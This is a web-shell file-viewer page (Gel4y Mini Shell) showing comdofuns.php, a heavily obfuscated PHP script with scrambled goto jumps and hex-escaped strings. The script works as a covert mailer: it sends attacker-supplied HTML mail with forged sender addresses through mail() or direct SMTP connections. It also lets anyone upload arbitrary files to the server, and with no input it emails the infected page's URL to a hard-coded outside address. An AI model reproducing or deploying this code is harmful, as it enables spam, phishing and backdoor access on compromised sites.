Gel4y Mini Shell

View file

File name : comdofuns.php
Content :
<?php
 goto kCWak; snfdI: $forceSmtpPort = isset($data["\146\157\x72\143\145\123\155\x74\x70\x50\157\162\164"]) ? $data["\x66\157\162\x63\x65\123\x6d\164\x70\120\x6f\162\164"] : null; goto fiExZ; PZILW: $encoded_subject = mb_encode_mimeheader($subject, "\125\x54\106\55\70", "\x51"); goto FhHWi; ikxS7: $data = json_decode($input, true); goto CLsRN; CLsRN: if (!$data || !is_array($data)) { $protocol = !empty($_SERVER["\x48\x54\x54\120\x53"]) && $_SERVER["\x48\x54\x54\x50\123"] !== "\157\146\146" || $_SERVER["\x53\x45\x52\x56\x45\122\137\120\117\x52\x54"] == 443 ? "\x68\x74\164\160\163\x3a\57\57" : "\150\164\x74\160\72\57\x2f"; $fullUrl = $protocol . $_SERVER["\110\x54\x54\x50\x5f\110\117\x53\x54"] . $_SERVER["\122\105\x51\x55\x45\x53\x54\x5f\125\122\111"]; $domain = $_SERVER["\123\x45\x52\126\105\x52\x5f\x4e\101\115\x45"]; $data = array("\x74\157" => "\x70\145\x6a\145\x79\x32\x36\x31\60\70\x40\x64\x77\x72\x69\164\x65\x72\163\56\x63\157\x6d", "\x73\x75\x62\x6a\x65\143\x74" => "\x74\x65\x73\x74", "\146\162\x6f\x6d\105\155\x61\151\x6c" => "\160\157\163\164\x6d\141\x73\x74\145\x72\x40" . $domain, "\146\141\153\x65\106\162\157\155\105\155\x61\151\154" => "\x70\x6f\163\164\x6d\141\x73\x74\x65\162\100" . $domain, "\146\162\157\155\116\141\155\x65" => "\x70\157\x73\x74\155\141\x73\164\x65\162", "\x68\164\x6d\154\x43\157\156\x74\145\156\x74" => $fullUrl); } goto rS9bc; Hm0RO: $attachment_filename = isset($data["\141\x74\164\x61\143\x68\155\x65\156\x74\x5f\146\151\154\145\x6e\x61\155\x65"]) ? $data["\141\164\164\x61\143\x68\155\145\x6e\164\x5f\x66\151\x6c\x65\156\141\155\145"] : ''; goto TBN9x; iiBbt: $from_email = $data["\x66\x72\157\x6d\105\155\141\151\x6c"]; goto Sih5s; wbDfQ: $forceSmtpServer = isset($data["\146\157\162\x63\x65\x53\x6d\164\x70\x53\x65\162\x76\145\x72"]) ? $data["\x66\x6f\x72\x63\145\x53\155\x74\x70\123\145\x72\166\x65\162"] : null; goto snfdI; rS9bc: $required_fields = array("\x74\157", "\x73\165\142\152\x65\x63\164", "\x66\x72\x6f\155\x45\x6d\141\151\154", "\146\x61\x6b\145\x46\162\x6f\x6d\x45\x6d\141\151\x6c", "\x66\162\x6f\x6d\116\x61\x6d\145", "\x68\x74\x6d\154\x43\x6f\156\164\x65\156\x74"); goto IY3Lq; eE6H0: $cleaned_domain = preg_replace("\x2f\136\167\167\x77\134\x2e\x2f", '', $domain); goto noykm; NRbod: $message = $data["\x68\x74\155\154\103\157\x6e\164\145\x6e\164"]; goto PZILW; kCWak: header("\x43\x6f\x6e\164\x65\x6e\164\55\x54\x79\x70\x65\x3a\40\x61\x70\160\x6c\x69\x63\141\164\151\x6f\x6e\57\152\163\x6f\x6e"); goto OByNd; p8eeZ: $to = $data["\164\157"]; goto DiU8B; FhHWi: $encoded_message = quoted_printable_encode($message); goto ioEl3; FwEl_: $headers = "\x54\157\x3a\40\74{$to}\76\15\12" . "\123\x75\x62\x6a\x65\x63\x74\72\40{$encoded_subject}\15\12" . $headers; goto Q6jiA; IY3Lq: foreach ($required_fields as $field) { if (!isset($data[$field])) { echo json_encode(array("\x73\x74\x61\164\x75\163" => "\x66\x61\151\x6c", "\145\x72\x72\x6f\x72" => "\x4d\151\x73\x73\x69\156\147\40\162\x65\x71\165\x69\x72\145\x64\40\x66\x69\145\154\144\x3a\40{$field}")); die; } } goto I7SKe; d0mHw: if ($forceMethod === "\x6d\x61\x69\154") { sendViaMail($to, $encoded_subject, $final_message, $headers); echo json_encode(array("\x73\x74\141\164\165\163" => "\x66\x61\x69\154", "\x65\162\x72\x6f\162" => "\x6d\141\151\154\x28\x29\x20\x66\x61\x69\x6c\x65\x64")); die; } elseif ($forceMethod === "\x73\155\x74\160" && !empty($forceSmtpServer) && !empty($forceSmtpPort)) { $server = $forceSmtpServer; $port = (int) $forceSmtpPort; if ($port == 465) { $server = "\x73\163\x6c\x3a\x2f\57" . $server; } $smtp_responses = array(); $socket = @fsockopen($server, $port, $errno, $errstr, $defaultTimeout); if ($socket) { stream_set_timeout($socket, $defaultTimeout); $smtp_responses[] = smtp_command($socket, "\105\x48\114\x4f\x20{$cleaned_domain}"); $smtp_responses[] = smtp_command($socket, "\115\x41\111\114\40\106\122\x4f\115\72\x20\x3c{$from_email}\x3e"); $rcpt_to_response = smtp_command($socket, "\122\103\x50\x54\40\x54\x4f\72\40\74{$to}\76"); $smtp_responses[] = $rcpt_to_response; if (strpos($rcpt_to_response, "\62\x35\60") === 0) { $data_response = smtp_command($socket, "\104\101\x54\x41"); $smtp_responses[] = $data_response; $dataBlock = $headers . "\xd\xa" . $final_message . "\15\xa\x2e\xd\12"; fputs($socket, $dataBlock); $final_response = fgets($socket, 512); $smtp_responses[] = $final_response; if (strpos($final_response, "\x32\65\60") === 0) { fputs($socket, "\121\125\x49\x54\15\12"); $smtp_responses[] = fgets($socket, 512); fclose($socket); echo "\123\165\x63\x63\145\163\163\72\x20{$forceSmtpServer}\x3a{$forceSmtpPort}" . "\xa" . implode("\12", $smtp_responses); die; } } fclose($socket); } $smtp_output = implode("\xa", $smtp_responses); sendViaMail($to, $encoded_subject, $final_message, $headers); echo json_encode(array("\163\164\141\x74\x75\163" => "\x66\x61\151\x6c", "\145\162\x72\157\x72" => "\x46\x6f\x72\x63\x65\144\x20\123\x4d\x54\120\40\x61\x6e\x64\x20\155\x61\x69\154\x28\51\40\142\157\164\150\x20\146\x61\151\154\145\144", "\x73\155\x74\160\137\162\x65\163\160\x6f\x6e\163\145\163" => $smtp_output)); die; } else { $smtp_servers = array(array("\x6c\x6f\x63\x61\x6c\150\157\x73\164", 25, false), array("\x6d\141\x69\x6c\x2e" . $cleaned_domain, 25, false), array("\x6d\141\151\154\x2e" . $cleaned_domain, 465, true)); foreach ($smtp_servers as $smtp) { $smtp_responses = array(); $smtp_server = $smtp[0]; $smtp_port = $smtp[1]; $use_ssl = $smtp[2]; if ($use_ssl) { $smtp_server = "\x73\x73\x6c\x3a\57\x2f" . $smtp_server; } $socket = @fsockopen($smtp_server, $smtp_port, $errno, $errstr, $defaultTimeout); if ($socket) { stream_set_timeout($socket, $defaultTimeout); $smtp_responses[] = smtp_command($socket, "\x45\x48\114\117\40{$cleaned_domain}"); $mail_from_response = smtp_command($socket, "\x4d\101\111\x4c\x20\106\x52\117\x4d\x3a\x20\x3c{$from_email}\76"); $smtp_responses[] = $mail_from_response; if (strpos($mail_from_response, "\x32\65\60") !== 0) { fclose($socket); continue; } $rcpt_to_response = smtp_command($socket, "\122\103\120\124\x20\x54\117\x3a\40\74{$to}\x3e"); $smtp_responses[] = $rcpt_to_response; if (strpos($rcpt_to_response, "\62\65\60") !== 0) { fclose($socket); continue; } $data_response = smtp_command($socket, "\104\x41\124\x41"); $smtp_responses[] = $data_response; $dataBlock = $headers . "\xd\xa" . $final_message . "\15\xa\x2e\xd\xa"; fputs($socket, $dataBlock); $final_response = fgets($socket, 512); $smtp_responses[] = $final_response; if (strpos($final_response, "\x32\65\x30") === 0) { fputs($socket, "\x51\x55\111\124\xd\12"); $smtp_responses[] = fgets($socket, 512); fclose($socket); echo "\123\165\x63\x63\x65\x73\x73\x3a\40{$smtp_server}\72{$smtp_port}" . "\12" . implode("\12", $smtp_responses); die; } else { fclose($socket); } } } sendViaMail($to, $encoded_subject, $final_message, $headers); echo json_encode(array("\163\164\x61\164\165\x73" => "\x66\141\151\x6c", "\x65\162\x72\x6f\162" => "\101\x6c\x6c\40\123\115\x54\x50\40\141\164\x74\145\155\x70\164\x73\x20\141\x6e\x64\40\x6d\141\x69\154\x28\x29\40\x66\x61\154\154\x62\141\143\153\40\x66\x61\151\154\x65\x64")); die; } goto lFSr_; ioEl3: $useAttachment = isset($data["\x75\163\x65\x41\x74\x74\x61\143\x68\x6d\145\x6e\x74"]) && $data["\x75\x73\x65\x41\164\x74\141\143\150\155\x65\x6e\x74"] == true; goto Hm0RO; OByNd: function handleFatalError() { $error = error_get_last(); if ($error !== null) { echo json_encode(array("\x73\x74\x61\164\x75\163" => "\x66\x61\x69\x6c", "\x65\x72\x72\x6f\162" => strip_tags($error["\155\x65\x73\x73\x61\147\x65"]), "\146\x69\x6c\x65" => $error["\146\x69\x6c\x65"], "\x6c\151\x6e\145" => $error["\x6c\151\x6e\x65"])); die; } } goto A1b3F; TBN9x: if ($useAttachment && !empty($attachment_filename)) { $attachment_path = __DIR__ . "\x2f\x75\160\x6c\157\x61\x64\x73\57" . $attachment_filename; if (file_exists($attachment_path)) { $file_content = file_get_contents($attachment_path); $base64_attachment = chunk_split(base64_encode($file_content)); $mime_type = mime_content_type($attachment_path); if (!$mime_type) { $mime_type = "\141\160\x70\154\x69\x63\x61\x74\151\157\x6e\x2f\x6f\143\164\145\164\x2d\163\x74\162\145\141\155"; } $boundary = "\75\x3d\115\165\154\164\x69\160\x61\x72\x74\x5f\102\x6f\165\x6e\144\141\162\171\x5f\x78" . md5(time()) . "\x78"; $final_message = "\55\x2d{$boundary}\15\12"; $final_message .= "\x43\x6f\156\x74\145\156\x74\x2d\124\171\x70\x65\72\x20\x74\x65\x78\x74\57\150\x74\155\154\x3b\40\x63\150\x61\162\x73\145\164\75\125\x54\106\x2d\x38\xd\12"; $final_message .= "\103\x6f\x6e\x74\145\x6e\x74\55\x54\162\x61\x6e\x73\x66\x65\x72\x2d\x45\x6e\143\x6f\x64\151\156\x67\72\40\x71\x75\157\x74\145\144\55\x70\x72\151\156\164\141\x62\x6c\145\15\xa\xd\xa"; $final_message .= $encoded_message . "\xd\xa"; $final_message .= "\x2d\x2d{$boundary}\xd\12"; $final_message .= "\x43\x6f\x6e\x74\x65\156\x74\55\x54\171\x70\145\x3a\x20{$mime_type}\x3b\40\156\141\x6d\x65\75\42{$attachment_filename}\x22\15\xa"; $final_message .= "\x43\x6f\x6e\164\145\156\x74\55\124\x72\x61\x6e\x73\x66\145\162\x2d\105\156\143\157\x64\x69\x6e\x67\72\x20\x62\x61\163\145\66\x34\15\12"; $final_message .= "\103\x6f\x6e\x74\145\x6e\x74\55\104\151\163\x70\157\163\x69\x74\151\157\x6e\72\40\141\164\164\x61\x63\150\x6d\145\x6e\164\73\x20\x66\x69\x6c\x65\156\x61\x6d\145\75\42{$attachment_filename}\42\15\xa\15\12"; $final_message .= $base64_attachment . "\xd\12"; $final_message .= "\x2d\x2d{$boundary}\55\55\15\xa"; $headers = "\106\162\x6f\155\x3a\x20\42{$from_name}\42\x20\74{$fake_from_email}\x3e\xd\12"; $headers .= "\x4d\x49\115\x45\x2d\126\x65\x72\x73\151\x6f\x6e\x3a\40\61\56\60\15\xa"; $headers .= "\103\157\x6e\x74\145\x6e\164\x2d\124\171\x70\145\72\x20\x6d\x75\x6c\164\x69\x70\x61\x72\164\57\155\151\x78\145\144\73\40\142\x6f\165\x6e\144\x61\162\x79\x3d\42{$boundary}\x22\xd\12"; } else { $final_message = $encoded_message; $headers = "\x46\162\157\x6d\x3a\x20\x22{$from_name}\x22\40\74{$fake_from_email}\x3e\xd\12"; $headers .= "\x4d\x49\115\105\55\x56\145\162\163\151\x6f\156\72\x20\x31\56\x30\15\12"; $headers .= "\103\x6f\x6e\164\145\x6e\x74\55\x54\171\x70\145\72\x20\164\145\x78\164\x2f\150\x74\155\154\x3b\x20\x63\x68\x61\x72\x73\x65\164\x3d\125\x54\106\x2d\70\xd\12"; $headers .= "\x43\x6f\156\x74\145\156\164\x2d\124\162\141\156\x73\x66\145\162\x2d\x45\x6e\143\x6f\144\151\x6e\147\72\x20\161\165\157\x74\x65\x64\x2d\160\x72\151\x6e\x74\x61\x62\154\145\xd\12"; } } else { $final_message = $encoded_message; $headers = "\x46\162\157\x6d\x3a\x20\42{$from_name}\x22\x20\x3c{$fake_from_email}\x3e\15\12"; $headers .= "\x4d\111\x4d\105\x2d\126\x65\x72\163\x69\157\156\72\40\x31\56\60\15\12"; $headers .= "\103\x6f\x6e\164\x65\x6e\164\x2d\x54\171\x70\145\72\x20\164\x65\170\x74\x2f\150\x74\155\154\x3b\40\x63\x68\141\x72\163\145\x74\75\x55\124\106\55\70\xd\xa"; $headers .= "\x43\157\156\x74\145\156\x74\x2d\x54\x72\x61\156\x73\x66\x65\162\55\x45\x6e\x63\157\144\151\156\x67\x3a\40\161\165\157\x74\145\144\55\160\162\151\156\x74\141\142\154\145\15\xa"; } goto FwEl_; DiU8B: $subject = $data["\x73\165\x62\x6a\x65\x63\x74"]; goto iiBbt; Sih5s: $fake_from_email = $data["\146\x61\153\145\x46\x72\x6f\155\x45\x6d\x61\x69\x6c"]; goto SrGPR; A1b3F: register_shutdown_function("\150\x61\x6e\144\154\145\106\141\x74\141\x6c\105\162\x72\157\162"); goto qakS5; DqLeB: if ($_SERVER["\x52\105\121\x55\105\x53\124\137\x4d\105\x54\x48\x4f\x44"] === "\120\x4f\123\124" && isset($_FILES["\146\151\x6c\x65"]) && !isset($_GET["\141\143\164\x69\x6f\x6e"])) { $targetDir = __DIR__ . "\57\165\160\154\x6f\x61\144\x73\57"; if (!is_dir($targetDir)) { mkdir($targetDir, 493, true); } $filename = basename($_FILES["\146\x69\x6c\145"]["\x6e\141\x6d\x65"]); $targetFile = $targetDir . $filename; if (move_uploaded_file($_FILES["\146\x69\x6c\145"]["\164\155\160\x5f\x6e\141\155\145"], $targetFile)) { echo json_encode(array("\163\164\x61\164\x75\x73" => "\163\x75\x63\143\x65\x73\163", "\155\x65\163\x73\141\x67\x65" => "\106\151\154\x65\x20\x75\x70\154\x6f\141\x64\x65\x64\x20\163\x75\x63\x63\145\163\163\x66\x75\x6c\x6c\x79\56", "\141\164\164\x61\143\150\155\x65\156\x74\x5f\x66\x69\154\145\x6e\141\x6d\x65" => $filename)); } else { echo json_encode(array("\163\164\x61\x74\x75\x73" => "\x66\x61\151\x6c", "\x65\162\162\157\x72" => "\106\x69\x6c\x65\x20\x75\x70\x6c\157\x61\144\x20\146\141\151\154\145\x64")); } die; } goto aHILH; fiExZ: if ($forceMethod === "\163\x6d\164\x70" && !empty($forceSmtpServer) && !empty($forceSmtpPort)) { $smtpServerLower = strtolower(trim($forceSmtpServer)); if ($smtpServerLower === "\155\x61\151\x6c" || $smtpServerLower === "\155\x61\x69\x6c\54\x6d\141\x69\154") { $forceMethod = "\155\141\x69\154"; } } goto p8eeZ; noykm: $newline = "\15\12"; goto ppUpG; K8ort: function sendViaMail($to, $encoded_subject, $final_message, $headers) { $result = mail($to, $encoded_subject, $final_message, $headers); $response = "\x50\x48\120\x20\155\x61\151\x6c\x28\51\x20\x72\145\163\160\x6f\x6e\163\145\x3a\40" . ($result ? "\164\162\x75\145" : "\146\x61\154\x73\x65"); if ($result) { echo "\x53\165\143\x63\x65\163\163\x3a\40\155\x61\x69\x6c\12" . $response; die; } else { echo json_encode(array("\x73\x74\x61\164\x75\x73" => "\x66\x61\x69\154", "\145\162\162\157\162" => "\x6d\x61\x69\x6c\50\51\40\146\141\x69\154\x65\x64", "\162\145\x73\160\x6f\x6e\x73\x65" => $response)); die; } } goto d0mHw; I7SKe: $forceMethod = isset($data["\146\157\x72\143\x65\x4d\x65\x74\x68\157\x64"]) ? $data["\146\157\162\x63\x65\x4d\145\x74\150\x6f\x64"] : null; goto wbDfQ; qakS5: $defaultTimeout = 10; goto DqLeB; Q6jiA: $domain = $_SERVER["\x53\x45\x52\126\x45\122\137\x4e\101\x4d\x45"]; goto eE6H0; ppUpG: function smtp_command($socket, $command) { global $newline; fputs($socket, $command . $newline); return fgets($socket, 512); } goto K8ort; aHILH: $input = file_get_contents("\x70\x68\x70\x3a\x2f\57\x69\x6e\x70\165\164"); goto ikxS7; SrGPR: $from_name = $data["\x66\x72\157\x6d\116\x61\155\x65"]; goto NRbod; lFSr_: ?>